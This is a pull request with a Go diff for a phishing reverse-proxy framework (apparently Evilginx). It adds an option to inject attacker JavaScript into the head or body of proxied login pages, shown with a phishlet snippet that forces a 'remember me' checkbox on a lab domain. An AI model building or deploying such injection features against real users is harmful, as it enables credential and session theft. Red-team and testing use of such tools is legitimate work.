### PR TITLE
added abitlity to inject scripts in head or body

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1328,7 +1328,7 @@ func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script string, src_url
 	if m_nonce != nil {
 		js_nonce = " nonce=\"" + m_nonce[1] + "\""
 	}
-	re := regexp.MustCompile(`(?i)(<\s*/body\s*>)`)
+	re := regexp.MustCompile(`(?i)(<\s*/head\s*>)`)
 	var d_inject string
 	if script != "" {
 		d_inject = "<script" + js_nonce + ">" + script + "</script>\n${1}"

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1167,13 +1167,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 								js_params = &s.Params
 							}
 							//log.Debug("js_inject: hostname:%s path:%s", req_hostname, resp.Request.URL.Path)
-							js_id, _, err := pl.GetScriptInject(req_hostname, resp.Request.URL.Path, js_params)
+							js_id, _, location, err := pl.GetScriptInject(req_hostname, resp.Request.URL.Path, js_params)
 							if err == nil {
-								body = p.injectJavascriptIntoBody(body, "", fmt.Sprintf("/s/%s/%s.js", s.Id, js_id))
+								body = p.injectJavascriptIntoBody(body, "", fmt.Sprintf("/s/%s/%s.js", s.Id, js_id), location)
 							}
 
 							log.Debug("js_inject: injected redirect script for session: %s", s.Id)
-							body = p.injectJavascriptIntoBody(body, "", fmt.Sprintf("/s/%s.js", s.Id))
+							body = p.injectJavascriptIntoBody(body, "", fmt.Sprintf("/s/%s.js", s.Id), location)
 						}
 					}
 				}
@@ -1321,14 +1321,14 @@ func (p *HttpProxy) javascriptRedirect(req *http.Request, rurl string) (*http.Re
 	return req, nil
 }
 
-func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script string, src_url string) []byte {
+func (p *HttpProxy) injectJavascriptIntoBody(body []byte, script string, src_url string, location string) []byte {
 	js_nonce_re := regexp.MustCompile(`(?i)<script.*nonce=['"]([^'"]*)`)
 	m_nonce := js_nonce_re.FindStringSubmatch(string(body))
 	js_nonce := ""
 	if m_nonce != nil {
 		js_nonce = " nonce=\"" + m_nonce[1] + "\""
 	}
-	re := regexp.MustCompile(`(?i)(<\s*/head\s*>)`)
+	re := regexp.MustCompile(`(?i)(<\s*/`+regexp.QuoteMeta(location)+`\s*>)`)
 	var d_inject string
 	if script != "" {
 		d_inject = "<script" + js_nonce + ">" + script + "</script>\n${1}"

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -94,6 +94,7 @@ type JsInject struct {
 	trigger_domains []string         `mapstructure:"trigger_domains"`
 	trigger_paths   []*regexp.Regexp `mapstructure:"trigger_paths"`
 	trigger_params  []string         `mapstructure:"trigger_params"`
+	location        string           `mapstructure:"location"`
 	script          string           `mapstructure:"script"`
 }
 
@@ -207,6 +208,7 @@ type ConfigJsInject struct {
 	TriggerDomains *[]string `mapstructure:"trigger_domains"`
 	TriggerPaths   *[]string `mapstructure:"trigger_paths"`
 	TriggerParams  []string  `mapstructure:"trigger_params"`
+	Location       *string   `mapstructure:"location"`
 	Script         *string   `mapstructure:"script"`
 }
 
@@ -474,13 +476,20 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			if js.Script == nil {
 				return fmt.Errorf("js_inject: missing `script` field")
 			}
+			location := "body"
+			if js.Location != nil {
+				if (*js.Location != "body" && *js.Location != "head") {
+					return fmt.Errorf("js_inject: unknown location - only 'head' or 'body' are supported")
+				}
+				location = p.paramVal(*js.Location)
+			}
 			for n := range *js.TriggerDomains {
 				(*js.TriggerDomains)[n] = p.paramVal((*js.TriggerDomains)[n])
 			}
 			for n := range *js.TriggerPaths {
 				(*js.TriggerPaths)[n] = p.paramVal((*js.TriggerPaths)[n])
 			}
-			err := p.addJsInject(*js.TriggerDomains, *js.TriggerPaths, js.TriggerParams, p.paramVal(*js.Script))
+			err := p.addJsInject(*js.TriggerDomains, *js.TriggerPaths, js.TriggerParams, p.paramVal(*js.Script), location)
 			if err != nil {
 				return err
 			}
@@ -807,7 +816,7 @@ func (p *Phishlet) GetLandingPhishHost() string {
 	return ""
 }
 
-func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[string]string) (string, string, error) {
+func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[string]string) (string, string, string, error) {
 	for _, js := range p.js_inject {
 		host_matched := false
 		for _, h := range js.trigger_domains {
@@ -847,12 +856,12 @@ func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[str
 							script = strings.Replace(script, "{"+k+"}", v, -1)
 						}
 					}
-					return js.id, script, nil
+					return js.id, script, js.location, nil
 				}
 			}
 		}
 	}
-	return "", "", fmt.Errorf("script not found")
+	return "", "", "", fmt.Errorf("script not found")
 }
 
 func (p *Phishlet) GetScriptInjectById(id string, params *map[string]string) (string, error) {
@@ -982,7 +991,7 @@ func (p *Phishlet) addHttpAuthToken(hostname string, path string, name string, h
 	return nil
 }
 
-func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths []string, trigger_params []string, script string) error {
+func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths []string, trigger_params []string, script string, location string) error {
 	js := JsInject{
 		id: GenRandomToken(),
 	}
@@ -1001,6 +1010,7 @@ func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths []string,
 		js.trigger_params = append(js.trigger_params, strings.ToLower(d))
 	}
 	js.script = script
+	js.location = location
 
 	p.js_inject = append(p.js_inject, js)
 	return nil


### PR DESCRIPTION
Hi,

This PR adds the ability to inject JS scripts at the end of the `<head>` section instead of the `<body>` section, which may be useful to execute the script before the page finishes loading. For instance, recently, I tried to deactivate a button but since the page took quite some time to load completely, most users could still click on the button because my injected script had not yet been executed. The default behavior is still to inject at the bottom of the body section but I added an optional `location` parameter in `js_inject` to pick 'head' or 'body':

Phishlet snippet:
```
js_inject:
  - trigger_domains: ["akira.lab.evilginx.com"]
    trigger_paths: ["/"]
    location: "head"
    script: |
      function lp() {
        checkbox = document.querySelector("#rememberCheck");
        if (checkbox != null) {
          checkbox.checked = true;
          return;
        }
        setTimeout(lp, 100);
      }
      lp();
```

Injecting in head (`location: 'head'`):

![image](https://github.com/user-attachments/assets/5667ce95-90c5-405c-9e3f-4ca5db8dc88f)

Injecting in body (`location: 'body'` or no location):

![image](https://github.com/user-attachments/assets/4269a4bc-46be-4978-9d77-91d043f8a36d)
